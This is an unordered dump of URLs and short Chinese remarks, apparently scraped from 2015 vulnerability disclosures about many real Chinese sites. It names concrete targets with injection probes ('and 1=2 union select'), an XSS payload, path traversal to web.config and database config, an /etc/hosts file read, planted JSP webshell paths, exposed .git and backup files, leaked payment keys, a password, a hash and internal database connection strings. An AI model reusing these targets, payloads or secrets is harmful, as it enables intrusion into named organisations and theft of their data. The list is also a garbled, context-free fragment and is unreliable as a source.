http://59.36.102.206/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://www.drama.wang/zhuama/web/!!然后通过目录可读在发现一个页面http://www.drama.wang/zhuama/web/public/Jcrop/Modify_face.html!上传页面? http://hr.conch.cn/login.jsp http://hr.conch.cn/portalLogin.jsp http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/detail.asp?id=1021 http://newoa.conch.cn/conchoa/login.jsp http://fanhua.cninsure.net/help.aspx http://demo.yershop.com/index.php?s=/Home/account/savepaykey.html post:uid=1 http://demo.yershop.com/index.php?s=/home/article/comment post:goodid=1 http://demo.yershop.com/index.php?s=/home/article/commentgood post:goodid=1 http://demo.yershop.com/index.php?s=/home/article/commentmiddle post:goodid=1 http://demo.yershop.com/index.php?s=/home/article/commentworse post:goodid=1 http://demo.yershop.com/index.php?s=/Home/center/shezhi post:id=1 http://demo.yershop.com/index.php?s=/Home/center/deleteAddress.html post:id=1 http://demo.yershop.com/index.php?s=/home/order/detail/id/1 http://demo.yershop.com/index.php?s=/home/order/cancel/id/1 http://demo.yershop.com/index.php?s=/home/order/canceldetail/id/1 http://demo.yershop.com/index.php?s=/home/order/backdetail/id/1 http://demo.yershop.com/index.php?s=/home/order/changedetail/id/1 http://demo.yershop.com/index.php?s=/home/order/wuliu/orderid/1 http://demo.yershop.com/index.php?s=/home/order/back/ post:id=1 http://demo.yershop.com/index.php?s=/home/order/backkuaidi/ post:backid=1 http://demo.yershop.com/index.php?s=/home/order/change/ post:id=1 http://demo.yershop.com/index.php?s=/home/order/changekuaidi/ post:backid=1 http://demo.yershop.com/index.php?s=/home/order/complete/id/1 http://demo.yershop.com/index.php?s=/home/pay/index/orderid/1 http://demo.yershop.com/index.php?s=/home/pay/chongzhi/orderid/1 
http://demo.yershop.com/index.php?s=/home/service/index/id/1 http://demo.yershop.com/index.php?s=/home/shopcart/addItem/ post:id=1'&i=1 http://demo.yershop.com/index.php?s=/home/shopcart/addgood/ post:id=1 http://demo.yershop.com/index.php?s=/home/shopcart/createorder/ post:tag=1 http://demo.yershop.com/index.php?s=/home/shopcart/delItemByuid/ post:sort=1 http://demo.yershop.com/index.php?s=/home/shopcart/getPricetotal/tag/1 http://demo.yershop.com/index.php?s=/home/shopcart/getpriceNum/id/1 http://demo.yershop.com/index.php?s=/home/user/checkcode/ post:couponid=1 http://demo.yershop.com/index.php?s=/home/user/getcoupon/ post:couponid=1 http://demo.yershop.com/index.php?s=/home/user/cut/id/1 http://demo.yershop.com/index.php?s=/home/article/comment http://bi.e-nci.com/manager/html http://bi.e-nci.com/portal/pages/login.jsp http://bi.e-nci.com/JspSpyJDK5/JspSpyJDK5.jsp?o=vLogin index.php/cms/carshop/ajax_dealerList/ http://a.xcar.com.cn:80/ http://www.qqtech.com/about/index.htm,如图所示: http://**.**.**.**/FCKeditor/editor/filemanager/connectors/test.html http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx https://github.com/superman66/wechatSDK-java/blob/c1993c1e0daa70c8169752abcd68cc5b110ed9be/src/core/app/wechat.properties http://zhidao.h3c.com/ http://**.**.**.**/eportal/fileDir/hezegsj/resource/cms/2015/08/2015080823123710201.jspx http://www.westone.com.cn/employ/positionid=34.html http://www.westone.com.cn/upload/简历/day_150808/201508080438589181.aspx http://m.mbaobao.com/user/address/list.html#address/edit/6592638 http://m.mbaobao.com http://m.mbaobao.com/user/address/list.html http://61.160.137.184/telcom10000/BBUserServlet?do=userAuthByIpAndPort X-Forwarded-For:49.69.204.2 android:allowBackup参数值为"true", http://dj.49you.com/web/CPGameManage.jsp http://dj.49you.com/web/cpincome.jsp http://dj.49you.com/web/cpProvinceList.jsp http://dj.49you.com/web/sy_sjwar_cpincome.jsp 
http://dj.49you.com/web/tab/LyGameIncome.jsp http://dj.49you.com/web/tab/WoGameIncome.jsp http://61.191.18.249/defaultroot/upload/information/2015080414251981972335215.jsp http://61.191.18.249/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://**.**.**.**/cityaccount/login.do www.chinalife.com.tw/servlet/webepaper002?step=1&pinWbephmbr=2008-05 http://moneydai.com https://github.com/biyefeilan/xyplatform https://github.com/biyefeilan/xyplatform/blob/a2b5fd1356b076f1a80e162d1f1a9a30f360901b/ulync-platform-webapp/src/main/resources/templates/register/form.html https://github.com/biyefeilan/xyplatform/blob/master/ulync-platform-webapp/src/main/resources/application-dev.properties jdbc:mysql://218.30.15.220:3306/xiyu_uums?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://111.205.15.132/iufotempfile/3anr7nnhccigdt07t5a386z64h5t31/system_013138.jsp http://www.cnyc.gov.cn/wsbs_more2.asp?classid=279 http://www.cnyc.gov.cn/admin.asp http://new.edong.com:80/ http://new.edong.com:80/ www.zjcgs.gov.cn/news_list.aspxid=26&page=1_ http://lib.cslg.cn:40000/lres/study/lecture.html?lec_type_id=5 http://siais.shanghaitech.edu.cn/newsview.asp?id=168 http://sqlmap.org http://www.daidaiwangfa.com/tinvest/reward?id=12 http://**.**.**.**:8087/ http://**.**.**.**:8087/ http://**.**.**.**/admin/ http://**.**.**.**/5.jsp Pass:allen http://**.**.**.**/welcome.do http://lexue.tcl.com/Admin/ http://passport.lexue.tcl.com/Passport/Login.aspx?ru=http%3a%2f%2flexue.tcl.com%2fAdmin%2fDefault.aspx&to=-2&aid=Admin&ip=123.233.7.82&lou=http%3a%2f%2flexue.tcl.com%2fAdmin%2fAdmin%2fMCSAuthenticateLogOff.axd&sf=e4d38dd8ef6298fe http://lexue.tcl.com/Admin/ http://**.**.**.**/admin/admin.jsp http://dj.49you.com/web/tab/manage.jsp?action=updatesave&id=11&type=2 
http://dj.49you.com/web/tab/QdGameIncome.jsp http://dj.49you.com/web/tab/SKGameIncome.jsp http://dj.49you.com/web/ltsjyx_income.jsp http://221.12.171.172:9101/ https://github.com/hs-fcloud/over-the-wall jdbc:mysql://rdsnqrqranqrqra.mysql.rds.aliyuncs.com:3306/hsgzl?useUnicode=true&amp;amp;characterEncoding=utf8&amp;amp;useServerPrepStmts=false&amp;amp;rewriteBatchedStatements=true http://edm.huitongke.com/Sd/ http://edm.huitongke.com/ http://h.kuwo.cn/hsy/hz/wdj/zhibotest.jsp?id=26 http://**.**.**.**/showsinglepage.php?catid=23 http://**.**.**.**/images/ http://apidemo.west263.com/try/ http://www.kangq.com http://www.kangq.com/index.php?app=public&mod=Account&act=address&id=30000&s=1 http://icme.haoyisheng.com/login/login.jsp http://www.kangq.com http://www.kangq.com/space/2014475 http://s.96335.com/wforder/order/unLogMyOrderDetail.action?model.flowId=W15080800001 http://**.**.**.** http://jiwei.nwnu.edu.cn/Article/index.php?id=67 http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://m.mbaobao.com http://m.mbaobao.com/login.html?sendURL=/user/ http://183.62.40.31/defaultroot/login.jsp http://183.62.40.31/jmx-console/ http://183.62.40.31/is/index.jsp https://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ysxkzcx.asp http://zzjz2.edong.com/webmall/query.php?catid=0&imageField=&key=1&myord=1&typeid=0 http://api.koudailc.com/project/project-detail?id=2055 http://**.**.**.**/DKasp/Login.asp http://www.ayibang.com/appointment/detail?keyword=project_depth_cleaning&city=%E5%8C%97%E4%BA%AC http://**.**.**.**/ http://www.kibey.com/square/ 
http://www.kibey.com/space/freenote/view/id/18229 http://zzjz2.edong.com/webmall/index.php?author=&catid=0&fromprice=&key=&myord=1&myshownums=&page=1&toprice=&typeid=0 http://new.edong.com:80/ http://61.144.226.2:7009/gzflhnw/LoginAction.do http://www.doyouhike.net/dujia/product/search/?keyword=1 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.feeyo.com/vote/view.asp?id=3c0aa6d9f9397746 http://cwc.njupt.edu.cn/phpmyadmin/ http://pinggu.hnfnu.edu.cn/Back/manage.asp http://news.xauat.edu.cn/guest.php目测没任何过滤,坐等cookie http://news.xauat.edu.cn/list.php?classid=55 http://news.xauat.edu.cn/read.php?classid=40&newsid=9291 www.angelvestgroup.com/info.php?id=1存在SQL注入 http://job.xcu.edu.cn/ http://cds.zt-express.com/PageViews/Site/List.aspx http://gzlss.hrssgz.gov.cn/gzlss_web/business/authentication/login.xhtml http://gzlss.hrssgz.gov.cn/gzlss_web/business/front/foundationcentre/getHealthcarePersonPayHistorySumup.xhtml?query=1&querylog=true&businessocde=291QB_YBGRJFLSCX&visitterminal=PC&aac001=1007919859&startStr=201505&endStr=201509 http://gzlss.hrssgz.gov.cn/gzlss_web/business/front/foundationcentre/anonview/viewPersonPayHistoryInfo.xhtml?aac001=1007919863&xzType=1&startStr=201505&endStr=201507&querylog=true&businessocde=291QB-GRJFLS&visitterminal=PC http://**.**.**/monitoring http://**.**.**.**/School/Style1/AboutUs?id=100942 www.minanins.com/maechannel/manage/bcJinPengProposalRelation/list.do?tc=29 www.minanins.com/maechannel/manage/bcJinPengProposalRelation/list.do?tc=29 http://**.**.**.**/p-960086653.html http://seecom.zte.com.cn/SmartTV/pcuser_initSubmit.action http://www.th360.cn/config.php~ http://www.th360.cn/index.php~ http://www.th360.cn/log.txt http://cip.dongfeng-nissan.com.cn http://admin.chineseoffice.com.cn/Default.aspx http://www.dfmg.com.cn/EN/Index.aspx http://**.**.**.**/images/menu/.svn/entries http://oa.minanins.com http://oa.minanins.com/maechannel/manage/bcJinPengProposalRelation/list.do?tc=29 
http://open.lianlianpay.com/ http://www.fengtouwang.com/log.txt http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5×tamp=20150513113540&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=8&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406 http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5×tamp=20150513113611&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=43&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406 http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5×tamp=20150513131605&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=35&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406 KEY:201505111000320502_ftouw_513113406 http://www.fengtouwang.com http://open.lianlianpay.com/ http://www.nanhaict.com/log.txt http://www.nanhaict.com/modules/payment/classes/llpay/llpay_notify_url.php&oid_partner=201502051000206505&sign_type=MD5×tamp=20150226100317&url_return=http://www.nanhaict.com/modules/payment/classes/llpay/llpay_return_url.php&user_id=670&version=1.0&key=201502051000206505nhct_20150225 http://www.nanhaict.com/modules/payment/classes/llpay/llpay_notify_url.php&oid_partner=201502051000206505&sign_type=MD5×tamp=20150226101647&url_return=http://www.nanhaict.com/modules/payment/classes/llpay/llpay_return_url.php&user_id=670&version=1.0&key=201502051000206505nhct_20150225 http://www.nanhaict.com/modules/payment/classes/llpay/llpay_notify_url.php&oid_partner=201502051000206505&sign_type=MD5×tamp=20150226145604&url_return=http://www.nanhaict.com/modules/payment/classes/llpay/llpay_return_url.php&user_id=670&version=1.0&key=201502051000206505nhct_20150225 KEY:201502051000206505nhct_20150225 http://www.nanhaict.com 
http://**.**.**.**/cbastats/cbalivedetail.aspx?matchno=C201440612553230&id=406&rid=1 http://www.361sport.com/index.php?m=Member&a=getpwd http://open.lianlianpay.com/ http://www.xyd.net.cn/log.txt http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/notify_url.php&oid_partner=201504271000301507&sign_type=MD5×tamp=20150513094538&url_return=http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/return_url.php&user_id=3559&valid_order=10080&version=1.0&key=allen http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/notify_url.php&oid_partner=201504271000301507&sign_type=MD5×tamp=20150513095410&url_return=http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/return_url.php&user_id=3559&valid_order=10080&version=1.0&key=allen http://www.xyd.net.cn/modules/account/payclasses/lianlian/notify_url.php&oid_partner=201504271000301507&sign_type=MD5×tamp=20150513095923&url_return=http://www.xyd.net.cn/modules/account/payclasses/lianlian/return_url.php&user_id=3559&valid_order=10080&version=1.0&key=allen KEY:allen http://www.xyd.net.cn http://**.**.**.**/bugs/wooyun-2015-0117270而发 http://**.**.**.**/web/WorkSort.aspx?ActiviId=4&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=27&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=17&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=3&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=4&typeId=1 http://**.**.**.**/webtraining/web/WorkSort.aspx?ActiviId=3&typeId=1 http://**.**.**.**/web/activiList.aspx?ActiviId=6 http://**.**.**.**/web/activiList.aspx?ActiviId=6 http://**.**.**.**/web/activiList.aspx?ActiviId=4 http://**.**.**.**/web/activiList.aspx?ActiviId=7齐齐哈尔市民学习网 http://**.**.**.**/web/activiList.aspx?ActiviId=9马鞍山市中小微企业网络学院 http://**.**.**.**/webtraining/web/activiList.aspx?ActiviId=6 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 
http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35齐齐哈尔市民学习网 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35马鞍山市中小微企业网络学院 http://**.**.**.**/webtraining/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/list.php?id=131 http://gonghui.pudong-edu.sh.cn/3.aspx密码123 www.123.com jdbc:sqlserver://172.16.100.49:1433;DatabaseName=ccbusiness jdbc:sqlserver://172.16.100.49:1433;DatabaseName=MHJKW jdbc:db2://172.16.100.33:50000/MHJKW jdbc:sqlserver://10.98.24.4:1433;DatabaseName=bslis jdbc:sqlserver://10.98.96.8:1433;DatabaseName=bslis jdbc:sqlserver://10.98.0.6:1433;DatabaseName=bslis jdbc:sqlserver://10.97.160.7:1433;DatabaseName=bslis jdbc:sqlserver://10.98.16.6:1433;DatabaseName=bslis jdbc:sqlserver://10.98.192.8:1433;DatabaseName=bslis jdbc:sqlserver://10.97.34.5:1433;DatabaseName=bslis jdbc:sqlserver://10.98.168.6:1433;DatabaseName=bslis jdbc:sqlserver://10.98.164.5:1433;DatabaseName=bslis jdbc:sqlserver://10.98.64.3:1433;DatabaseName=bslis jdbc:sqlserver://10.97.128.6:1433;DatabaseName=bslis jdbc:sqlserver://10.98.236.118:1433;DatabaseName=bslis jdbc:sqlserver://10.98.110.2:1433;DatabaseName=bslis jdbc:sqlserver://10.96.36.40:1433;DatabaseName=mhsqxt jdbc:sqlserver://10.96.36.37:11433;DatabaseName=mhjkw jdbc:sqlserver://10.98.24.4:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.96.8:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.0.6:1433;DatabaseName=bsrun jdbc:sqlserver://10.97.160.7:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.16.6:1433;DatabaseName=bsrun jdbc:sqlserver://10.97.34.5:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.192.8:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.168.6:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.17.20:1433;DatabaseName=bsrun http://www.ilvxing.com/Item/index/pro_id/106146 http://oa.tianya.cn:89/m1/cmd.jsp http://**.**.**.**/product.php?classcode=101101 http://**.**.**.**/new_detail.php?keyno=25 http://14.18.22.22/portal/Login/enterError.jsp http://14.18.22.22/portal/Login/合道科技服务目录.htm 
http://vip.gdpr.com/ http://vip.hopson.com.cn/ http://m.dianwoba.com/h5/order/order!status.do?orderId=93601408&from= http://ces.hhu.edu.cn:4848/login.jsf http://ces.hhu.edu.cn:4848/applications/upload.jsf http://www.gzshjs.gov.cn/list.shtml?nodeid=1 http://mng.zhenai.com/index.do http://info.17ugo.com/t13/hao24/?id=1 http://you.yaochufa.com/portal/feedback/index/page/2 http://you.yaochufa.com/portal/feedback/index/page/2 http://you.yaochufa.com/portal/feedback/index/page/2 http://bangong.aili.com/www.rar http://121.41.167.78/index.php?g=admin&m=public&a=login http://kw9.nbark.com:8888/Index.aspx http://m.dianwoba.com/h5/address!initEdit.do?lastUrl=&addrsId=2222227 http://wap.zhengzai.tv/forms/find_phone.html http://www.fan800.net/yiwankuai.php http://mall.360.com/user/doAddAddr http://222.240.176.22/ http://222.240.176.21/index.php?m=member&c=index&a=login http://85.16.17.12:8012/ https://cms.hit.edu.cn/.git/config http://www.oppein.cn/user/retakepassword http://114.251.251.53 http://114.251.251.53/pay/warning.jsp jdbc:oracle:thin:@10.0.14.163:1521:orcl jdbc:oracle:thin:@10.0.14.163:1521:orcl jdbc:oracle:thin:@10.0.14.163:1521:orcl http://my.adsmogo.com/Account/Edit http://**.**.**.**/ent/ktAction!checkUserName.do?user.userName= http://202.120.129.242/pathological/Content.php?pid=0&cid=2 http://www.zmifi.com/ryadmin/Index.asp http://vip.ufida.com.cn/nccsm/Admin.aspx www.xisu.edu.cn/news/display.php?id=11&table=intercourse http://180.97.34.106:8200//_search http://c2.yunpan.360.cn/docviewer/excelviewer?nid=14391836926105610&type=xls&id=undefined&hisFile=undefined&scid=32&size=271360 http://yunpan.cn/cdPf2i6VYK6uJ http://hr.bankwf.com:8822/UserFiles/Image/36L4j.jsp http://**.**.**.**/ http://122.225.201.204:8081/login.aspx http://122.225.201.204:8081/CodeTree/DownFile.aspx?fileurl=UpFile/../web.config user:192.1.1.176\administrator,如果在同一台机器上设置为空 http://122.225.201.204:8081/help.aspx?Id=5 http://112.65.142.236 http://112.65.142.236:8888 http://112.65.142.236:8090 
http://112.65.142.236:8081/Test/ http://112.65.142.236:8081/scripts/ http://112.65.142.236:8081/account/ http://112.65.142.236:8081/Images/ http://112.65.142.236:8081/map/ http://112.65.142.236:8081/obj/Debug/ http://**.**.**.**/login.php http://**.**.**.**/fwsn.php?id=261 http://**.**.**.**/content.php?id=32331 http://**.**.**.**/fwsn.php?id=261: http://**.**.**.**/content.php?id=32331: https://www.erongbo.com http://58.49.58.75:40069/login.aspx http://58.49.58.75:40069/server.aspx http://e.shengjing360.com/elogin/toLogin http://learn.shengjing360.com/kbms/toPreview.action?type=N&doctype=D&docid=4523&from_sso=Y&userid=6561&ticket=0c7405d7e2eaebb155b74aaa4e646bfe http://kf.upgame.com.cn/admin.php?s=/Question/index/p/2 http://kf.upgame.com.cn/admin.php?s=/Question/index/p/2 http://kf.upgame.com.cn/admin.php?s=/Question/index/p/2 http://**.**.**.**/supplierPrintAction.action?action=printSup&sprNo=3202000013131&WebShieldDRSessionVerify=ua0k9Mc1l80qBvFcNGdV http://**.**.**.**/supplierPrintAction.action?action=printSup&sprNo=3202000013132&WebShieldDRSessionVerify=ua0k9Mc1l80qBvFcNGdV www.luculent.net/web.rar http://168.168.10.16这个IP http://www.eldshop.com/bbs/index.html?q=reply&action=quote&tid=48 http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/maincontent.asp?id=17 http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/kcsm.asp?id=147 http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/sybz.asp?id=174 https://ssl.hisense.com/+CSCOE+/logon.html http://ehr.hisense.com/ http://**.**.**.**:8089//user/user_news_show.aspx?id=10 http://m.tiexue.net/touch/Login.aspx这个接口是铁血网手机登陆接口,发现登陆处未做登陆限制 http://www.pioneerchina.com/minisite/pioneer-jtyl/Nsales_Info.php?id=6&titleCode=B01 http://m.meitun.com/login.html http://m.meitun.com/login.html http://506pingjia.cofco.com:8080/IR/fisummary.jsp?ClassID=13 http://www.360hitao.com/ https://member.360hitao.com/member/address.aspx https://member.360hitao.com/member/ashx/address.ashx?methods=edit&ruid=184063&_=1439197472540 
https://member.360hitao.com/member/ashx/address.ashx?methods=delete&ruid=184063&_=1439197786725 http://bangong.aili.com/includes/ http://bangong.aili.com/config/ http://**.**.**.**/app_system_login/ http://www.erongbo.com/about.php?rid=122 http://simple.minanins.com:9004/install/ http://efly.cc/ec/ http://app.admin5.com/update.php http://app.admin5.com/template/admin/#union/union_gl http://em.cjlu.edu.cn/index.php?r=site/login http://218.202.44.100:81/TPlus/login.aspx http://list.qq.com http://list.qq.com/cgi-bin/qf_columnmgr?t=qf_resultcol&action=set&resp_charset=gbk&column_name=bbaaaddd&column_def=bababa&sid=EhMyXCMzj2ighR5L&alias_def=@'and www.guoshi.com www.guanggao.guoshi.com/teacher/admin/ http://fwjy.chinaiiss.com/ http://bbs.dji.com/plane.tar.gz http://bbs.dji.com/plane.tar http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=1&name=spacecomments%20where%201=2 http://ehr.cofco.com/logonData.do# http://admin.by-health.com.cn/ http://www.jjwxc.cn/ http://task.iflytek.com/vs/Home/LogOn http://credit.open.com.cn/Home/LoginSubmit http://**.**.**.**/Login/Login.aspx www.jrt2010.com/htgl/member/company/ListMember.aspx http://xshd.jlau.edu.cn/read.asp?id=1039 http://qzlx.jlau.edu.cn/news/menusub.asp?stype=17 http://biolab.sdau.edu.cn/news_view.asp?c_id=199 http://www.ycdxoa.cn/ http://61.161.127.158/login.jsp http://bbs.joy-game.com/utility/convert/index.php http://123.59.13.112:8081/sysinfo/versions http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00498&id=1 http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00497&id=1 http://www.hupo.com/query_account1.php?UserName=CasterJs http://www.yongche.com/ajax/loaduser.php?callback=_loadUserDone&.js=aa&rd=18849.495749313934 http://admin.cnmo.com/stat_hits/pro_hits_statistic_plan_list.php?page=1 Username:NetCafe Password:123456 Hash:d608b7574ce96c797ecdb82a3bd121a6 http://222.195.76.136/News.php?id=13 http://222.195.76.136/News.php?id=13%20and%201=1正常 http://222.195.76.136/News.php?id=13%20and%201=2 
http://222.195.76.136/News.php?id=13%20and%201=2%20order%20by%203 http://222.195.76.136/News.php?id=13%20and%201=2%20union%20select%201,2,3 http://101.227.20.238:8080 https://www.hhrfs.com:443/ www.hhrfs.com http://119.188.147.245/list http://119.188.147.56 http://119.188.147.50 http://119.188.147.201 http://119.188.147.200 http://106.120.155.111:8080/authentication/publishserverview http://106.120.155.75 http://106.120.155.76 http://106.120.155.77 http://106.120.155.78 http://admin.gzg2b.gov.cn/login.aspx?ReturnUrl=%2f http://t.anquan365.org/login.jsp http://**.**.**.**/login.aspx http://vmn.cheyou96366.com/default.aspx http://vmn.cheyou96366.com/Manage/ManagerHome.aspx http://vmn.cheyou96366.com/Manage/ManageComm.aspx http://vmn.cheyou96366.com/Manage/EnterNumberList.aspx?entid=273&CertType=0&isused=0&CertID=5733 http://dacheng.weimob.com/dclawmanage http://oa.gwbnsh.net.cn/member/MemberLogin.aspx http://800best.ihrscloud.com/ http://800best.ihrscloud.com/uploads/ http://yc.xcar.com.cn/beijing/solve/?cat=34&search=53,2 https://github.com/hyp19881119/My2014To2015 https://github.com/hyp19881119/My2014To2015/blob/master/AccountList.xls https://vpn.baidu.com/+CSCOE+/logon.html https://mytoken.baidu.com/login.jsp http://**.**.**.**/Home/Index www.datebao.com ftp://218.202.3.77 http://218.202.3.72:8080/right/login.do http://**.**.**.**/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php https://github.com/YCjia/workSpace https://github.com/YCjia/workSpace/blob/9d4309374f48970b02470d4472cae843a89a841f/vrc-job/src/main/resources/topology.properties https://github.com/YCjia/workSpace/blob/master/vrc-job/src/main/resources/filters/prod.properties http://**.**.**.**/server-manage/admin/login.html http://**.**.**.**/server-ue2/busesMonitor/main.html http://202.108.173.78:8080 http://wz.edong.com/ http://**.**.**.**/jsjywxbmpt/login.aspx http://**.**.**.**/jsjywxbmpt/admin/UserManager/AddUsers.aspx 
http://**.**.**.**/jsjywxbmpt/WxSystem/WxToken.aspx http://**.**.**.**/ecs_vip/perfUser?signPhone=13880188991%27%3Cscript%3EAlert%28%22%22%29%3C/script%3E11111111111111111%3Cscript%3Ealert%28%22/xss/%22%29%3C/script%3E http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0605&qtnGroupNo=44b0b3b557ae473ba1ac05382ca68c59&qtnNo=1127685F21432708E054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0607&qtnGroupNo=cd964f0d661a4cf0ab16f2134979c5e4&qtnNo=19921D13DAE823A9E054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0607&qtnGroupNo=cd964f0d661a4cf0ab16f2134979c5e4&qtnNo=19921D13DAE823A9E054001517EDAD9C http://**.**.**.**/ecs_shop/vhl/calcvhlquoteresult.do?qtngroupno=2A3B1A2D6C734EF4B441831DA150FF7E&servcitycode=511700 http://**.**.**.**/ecs_shop/vhl/apply/inputapplyinfo.do?servcitycode=510800&qtnno=0586e3cc331c45fdaf8b7bbb948313fb&usevoucher=&qtngroupno=6323B94568DF47A5BF40A7245DAA595B http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0601&qtnGroupNo=09fa433cb7d1471e856f2f2ff2dd3c6a&qtnNo=135D029F6C535584E054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0601&qtnGroupNo=4a125c8103c647e69503ac01237b53b2&qtnNo=0DC59EFD7819040EE054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0602&qtnGroupNo=f667d4486d9243ed99d546362006058e&qtnNo=0F2B8D2AC9DE6DEDE054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0604&qtnGroupNo=3cbe7a7e35a3453f80c8e615e82764fb&qtnNo=0C6D0ED95D732182E054001517EDAD9C http://**.**.**.**/ZWMdp/temp/source/B48F88119420E1AD7C0887362EFEC62F/19424521.html#xiangxipage http://**.**.**.**/ZWMdp/temp/source/994ECC91A6F1186B3393604B7BCE90F0/155343618.html https://www.yuancredit.com/cust/forgetpasswordone/0 http://www1.xjmu.edu.cn/hbxy/list_page_1.asp?classid=4 http://www1.xjmu.edu.cn/jjxx/list_page_1.asp?classid=64 http://www1.xjmu.edu.cn/hbxy/detail_page_ind.asp?articleid=688 
http://www1.xjmu.edu.cn/hbxy/detail_page.ASP?articleid=741 http://222.197.183.145:8080/web/shop.do http://**.**.**.**/api/index.php?m=user&a=login&loginName=admin888&loginPass=123456&callback=jQuery183042493096832565613_1438956458577&_=1438956661891 http://**.**.**.**/api/index.php?m= http://**.**.**.**/p.asp?id=1 http://c3.cofco.com/index.php?app=public&mod=Passport&act=login http://jingang.yto56.com.cn/exptrack/main.action http://116.228.70.245/logout.aspx http://www.ewanse.com/userv3/forget http://union.mchina.cn/default.action http://www2.lib.nankai.edu.cn/nav/Chinese/show/data_search.asp www2.lib.nankai.edu.cn http://hzfz.hhu.edu.cn/ http://mba.cupl.edu.cn/mba/index/search_index?keyword=%E6%90%9C%E7%B4%A2 http://jydd.zjedu.org/common/key_xxgl.php http://twy.zjedu.org/search/key_xxgl.php http://vps.myxinnet.com/logs/20150804.txt http://info.17ugo.com/t20/cntvs/?id=1 http://info.17ugo.com/t30/jjlg/?id=1 http://info.17ugo.com/t4/best1/?id=1 http://info.17ugo.com/t5/3jgo/?id=1 http://info.17ugo.com/t6/ocjgo/?id=1 http://info.17ugo.com/t8/gxlsg/?id=1 http://**.**.**.** http://**.**.**.**/thadmin/admin.php http://beijing.anjuke.com/tycoon/p49 http://mendian.anjuke.com http://my.anjuke.com/ajkbroker/login/ http://my.anjuke.com/fxb/login/ http://www.dianwoba.com/auth/reset_password_01.do http://**.**.**.**/webgs/qycx.do?method=query http://**.**.**.**/webgs/qycx.do?method=enter http://college.weimob.com/Student.php http://college.weimob.com http://i.v.youmi.cn:80/thread/listOnAlbum/?albumid=133&state=1&page=2&orderby=1 http://data.fs.focus.cn/.git/config http://124.225.213.39/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://vps.myxinnet.com/WhiteList/DomainLogShow.aspx?hn=longweier.com%27and%201=1--%20 http://vps.myxinnet.com/WhiteList/DomainLogShow.aspx?hn=longweier.com%27and%201=2--%20 http://jydd.zjedu.org/admin/login.php的登陆框也存在SQL注入漏洞 http://jydd.zjedu.org/admin/login.php 